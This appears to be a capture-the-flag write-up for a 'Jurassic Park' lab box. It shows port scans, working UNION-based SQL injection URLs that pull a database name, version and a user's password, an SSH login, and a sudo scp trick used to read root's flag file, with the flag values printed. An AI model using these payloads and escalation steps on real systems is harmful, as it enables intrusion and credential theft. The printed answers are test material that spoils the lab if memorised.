Jurassic Park
Port scanning
Starting with a fast port scan to see which ports are open.
root@lab:~/THM/JurassicPark# nmap -T4 -sS -p- jurassic.park Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-30 20:40 CEST Nmap scan report for jurassic.park (10.10.10.170) Host is up (0.036s latency). Not shown: 65533 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 20.65 seconds
Then more options specific targeted on the open ports to get more information.
root@lab:~/THM/JurassicPark# nmap -T4 -sS -sV -sC -p22,80 jurassic.park Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-30 20:40 CEST Nmap scan report for jurassic.park (10.10.10.170) Host is up (0.032s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 9a:fb:a3:13:72:b3:53:59:94:b8:16:02:d1:d2:7e:32 (RSA) | 256 76:32:44:a0:39:24:97:44:4f:43:7b:01:39:fb:cd:84 (ECDSA) |_ 256 33:7e:04:8e:db:96:06:af:20:90:a2:81:3d:45:db:8f (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Jarassic Park Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.04 seconds
Not much information and a misspelled Jarassic Park as title of the website.
On the main page is again the misspelled name……maybe it’s not misspelled but a hint for JAR files?
In the source code there is a comment:
<!-- <video src="assets/theme.mp3" autoplay> -->
Some web enumeration shows a folder.
root@lab:~/THM/JurassicPark# dirsearch -u http://jurassic.park -e php -x 404 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt _|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| ) Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 207627 Error Log: /opt/tools/dirsearch/logs/errors-19-09-30_20-43-13.log Target: http://jurassic.park [20:43:13] Starting: [20:43:13] 200 - 1KB - / [20:43:14] 301 - 315B - /assets -> http://jurassic.park/assets/ [20:43:33] 200 - 65B - /delete [20:48:11] 403 - 301B - /server-status Task Completed
root@lab:~/THM/JurassicPark# curl jurassic.park/delete New priv esc for Ubunut?? Change MySQL password on main system!
There is also a shop with a parameter in the URI. When replacing the number with a single quote, I get a very nice result.
And at the bottom the text: YOU DIDN’T SAY THE MAGIC WORD! Try SqlMap.. I dare you..
But when entering a double quote I get a better result, namely an SQL error.
Before continuing with the SQLi option, I first want to check out the parameter first.
root@lab:~/THM/JurassicPark# for i in {1..25}; do echo -e "id=$i\n\n" && curl -s http://jurassic.park/item.php?id=$i | grep -A 10 '<body>' && echo -e '\n------------------------------------------------\n'; done
id=1
<body>
<section class='black text-center'>
<a href="/index.php"><img width=300px src="assets/Jurassic-Park-Logo.png"></a></br></br>
<h1>Gold Package</h1></br>
</section>
<div class="container text-center">
<h3>Price: $500000</h3></br>
<div class="alert alert-primary" role="alert"><b>4</b> of these packages have been sold in the last hour.</div></br>
<h4>Childen under 5 can attend free of charge and will be eaten for free. This package includes a dinosaur lunch, tour around the park AND a FREE dinosaur egg from a dino of your choice!</h4>
</br><h4>Order yours quick by calling us!</h4>
------------------------------------------------
id=2
<body>
<section class='black text-center'>
<a href="/index.php"><img width=300px src="assets/Jurassic-Park-Logo.png"></a></br></br>
<h1>Bronse Package</h1></br>
</section>
<div class="container text-center">
<h3>Price: $250000</h3></br>
<div class="alert alert-primary" role="alert"><b>11</b> of these packages have been sold in the last hour.</div></br>
<h4>Children under 5 can attend free of charge and eat free. This package includes a tour around the park and a dinosaur lunch! Try different dino's and rate the best tasting one!</h4>
</br><h4>Order yours quick by calling us!</h4>
------------------------------------------------
id=3
<body>
<section class='black text-center'>
<a href="/index.php"><img width=300px src="assets/Jurassic-Park-Logo.png"></a></br></br>
<h1>Basic Package</h1></br>
</section>
<div class="container text-center">
<h3>Price: $100000</h3></br>
<div class="alert alert-primary" role="alert"><b>27</b> of these packages have been sold in the last hour.</div></br>
<h4>Children under 5 can attend for free and eat free. This package will include a basic tour around the park in the brand new automated cars!</h4>
</br><h4>Order yours quick by calling us!</h4>
------------------------------------------------
id=4
id=5
<body>
<section class='black text-center'>
<a href="/index.php"><img width=300px src="assets/Jurassic-Park-Logo.png"></a></br></br>
<h1>Development Package</h1></br>
</section>
<div class="container text-center">
<h3>Price: $0</h3></br>
<div class="alert alert-primary" role="alert"><b>0</b> of these packages have been sold in the last hour.</div></br>
<h4>Dennis, why have you blocked these characters: ' # DROP - username @ ---- Is this our WAF now?</h4>
</br><h4>Order yours quick by calling us!</h4>
------------------------------------------------
id=6
id=7
id=8
So there is some useful information when entering id=5.
Ok….so let’s recap what we have so far.
There is a parameter which is vulnerable to SQLi, but there are some defensive settings in place. I have running a sqlmap with WAF tampering options running in the background, but it has not gotten anything viable. So until I can let sqlmap do the dumping of the database, I have to do some manual labor myself.
SQL Injection
#1 What is the SQL database called which is serving the shop information?
root@lab:~/THM/JurassicPark# curl -s "http://jurassic.park/item.php?id=5%20UNION%20SELECT%201,database(),3,4,5" | \grep '<h1>' | cut -d '>' -f2 | cut -d '<' -f 1 park Package
#2 How many columns does the table have?
That’s clear from the previous command: 5
#3 Whats the system version?
root@lab:~/THM/JurassicPark# curl -s "http://jurassic.park/item.php?id=5%20UNION%20SELECT%201,version(),3,4,5" | \grep '<h1>' | cut -d '>' -f2 | cut -d '<' -f 1 5.7.25-0ubuntu0.16.04.2 Package
#4 What is dennis’ password?
Because there is a filter on ‘username’ I need to guess the table and column names a bit. After a little while I get a password.
root@lab:~/THM/JurassicPark# curl -s "http://jurassic.park/item.php?id=5%20UNION%20SELECT%201,password,3,4,5%20from%20users" | \grep '<h1>' | cut -d '>' -f2 | cut -d '<' -f 1 ih8dinos Package
#5 Locate and get the first flag contents.
root@lab:~/THM/JurassicPark# ssh dennis@jurassic.park
The authenticity of host 'jurassic.park (10.10.150.111)' can't be established.
ECDSA key fingerprint is SHA256:/qDcDUmBukzaryWv8jvW3cafeByJkfebR0UcVxD/wVE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'jurassic.park,10.10.150.111' (ECDSA) to the list of known hosts.
dennis@jurassic.park's password:
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.4.0-1072-aws x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Get cloud support with Ubuntu Advantage Cloud Guest:
http://www.ubuntu.com/business/services/cloud
62 packages can be updated.
45 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
dennis@ip-10-10-150-111:~$ ls -lah
total 44K
drwxr-xr-x 3 dennis dennis 4.0K Sep 30 20:20 .
drwxr-xr-x 4 root root 4.0K Feb 16 2019 ..
-rw------- 1 dennis dennis 1001 Feb 16 2019 .bash_history
-rw-r--r-- 1 dennis dennis 220 Feb 16 2019 .bash_logout
-rw-r--r-- 1 dennis dennis 3.7K Feb 16 2019 .bashrc
drwx------ 2 dennis dennis 4.0K Sep 30 20:20 .cache
-rw-rw-r-- 1 dennis dennis 93 Feb 16 2019 flag1.txt
-rw-r--r-- 1 dennis dennis 655 Feb 16 2019 .profile
-rw-rw-r-- 1 dennis dennis 32 Feb 16 2019 test.sh
-rw------- 1 dennis dennis 4.3K Feb 16 2019 .viminfo
dennis@ip-10-10-150-111:~$ cat flag1.txt
Congrats on finding the first flag.. But what about the rest? :O
b89f2d69c56b9981ac92dd267f
#6 Whats the contents of the second flag?
dennis@ip-10-10-150-111:~$ find / -iname "flag*" -type f 2>/dev/null /home/dennis/flag1.txt /sys/devices/pnp0/00:06/tty/ttyS0/flags /sys/devices/vif-0/net/eth0/flags /sys/devices/virtual/net/lo/flags /sys/devices/platform/serial8250/tty/ttyS1/flags /sys/devices/platform/serial8250/tty/ttyS2/flags /sys/devices/platform/serial8250/tty/ttyS3/flags /usr/src/linux-aws-headers-4.4.0-1072/scripts/coccinelle/locks/flags.cocci /usr/src/linux-headers-4.4.0-1072-aws/include/config/zone/dma/flag.h /boot/grub/fonts/flagTwo.txt dennis@ip-10-10-150-111:~$ cat /boot/grub/fonts/flagTwo.txt 96ccd6b429be8c9a4b501c7a0b117b0a
#7 Whats the contents of the third flag?
dennis@ip-10-10-150-111:~$ cat .bash_history Flag3:b4973bbc9053807856ec815db25fb3f1
#8 Whats the contents of the fourth flag?
dennis@ip-10-10-150-111:~$ cat .viminfo > /tmp/flagFour.txt
But there is no /tmp/flagFour.txt. When reading the discord chatroom, this is confirmed by the creator of the room.
#9 Whats the contents of the fifth flag?
dennis@ip-10-10-150-111:~$ sudo -l
Matching Defaults entries for dennis on ip-10-10-150-111.eu-west-1.compute.internal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User dennis may run the following commands on ip-10-10-150-111.eu-west-1.compute.internal:
(ALL) NOPASSWD: /usr/bin/scp
dennis@ip-10-10-150-111:~$ ls -ld /usr/bin/scp
-rwxr-xr-x 1 root root 80016 Nov 5 2018 /usr/bin/scp
dennis@ip-10-10-150-111:~$ cat test.sh
#!/bin/bash
cat /root/flag5.txt
dennis@ip-10-10-150-111:~$ sudo scp -r /root/flag5.txt /tmp
dennis@ip-10-10-150-111:~$ ls -lah /tmp
total 40K
drwxrwxrwt 9 root root 4.0K Sep 30 20:25 .
drwxr-xr-x 23 root root 4.0K Sep 30 19:46 ..
-rw-r--r-- 1 root root 33 Sep 30 20:25 flag5.txt
drwxrwxrwt 2 root root 4.0K Sep 30 19:46 .font-unix
drwxrwxrwt 2 root root 4.0K Sep 30 19:46 .ICE-unix
drwx------ 3 root root 4.0K Sep 30 19:46 systemd-private-eed490776f0c401db680b0c43a10f612-systemd-timesyncd.service-02qwMJ
drwxrwxrwt 2 root root 4.0K Sep 30 19:46 .Test-unix
drwxrwxrwt 2 root root 4.0K Sep 30 19:46 .X11-unix
drwxrwxrwt 2 root root 4.0K Sep 30 19:46 .XIM-unix
dennis@ip-10-10-150-111:~$ cat /tmp/flag5.txt
2a7074e491fcacc7eeba97808dc5e2ec